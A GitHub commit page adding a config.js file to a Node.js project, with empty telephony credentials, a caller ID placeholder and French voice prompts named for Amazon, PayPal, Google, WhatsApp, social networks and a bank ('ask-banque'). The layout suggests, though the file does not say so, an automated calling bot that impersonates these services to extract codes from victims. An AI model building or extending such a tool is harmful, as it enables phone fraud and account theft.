Skip to content

Commit

Permalink
Create config.js
Browse files Browse the repository at this point in the history
  • Loading branch information
millerjsdev committed Apr 8, 2024
1 parent 4a78c03 commit 0bf2a61
Showing 1 changed file with 24 additions and 0 deletions.
24 changes: 24 additions & 0 deletions config/config.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
module.exports = {
setupdone: 'false',
accountSid: '',
authToken: '',
callerid: '+yourcallerid',

apipassword: 'passwordtochange',
serverurl: 'http:https://yourserverip:777',
port: process.env.PORT || 777,

amazonfilepath: './voice/fr/amazon/ask-amazon.mp3',
cdiscountfilepath: './voice/fr/cdiscount/ask-cdiscount.mp3',
twitterfilepath: './voice/fr/twitter/ask-twitter.mp3',
whatsappfilepath: './voice/fr/whatsapp/ask-whatsapp.mp3',
paypalfilepath: './voice/fr/paypal/ask-pp.mp3',
googlefilepath: './voice/fr/google/ask-google.mp3',
snapchatfilepath: './voice/fr/snapchat/ask-snapchat.mp3',
instagramfilepath: './voice/fr/instagram/ask-instagram.mp3',
facebookfilepath: './voice/fr/facebook/ask-facebook.mp3',
endfilepath: './voice/fr/done/call-done.mp3',
defaultfilepath: './voice/fr/default/ask-default.mp3',
banquefilepath: './voice/fr/banque/ask-banque.mp3',
testsms: 'this is a test from miller'
};

0 comments on commit 0bf2a61

Please sign in to comment.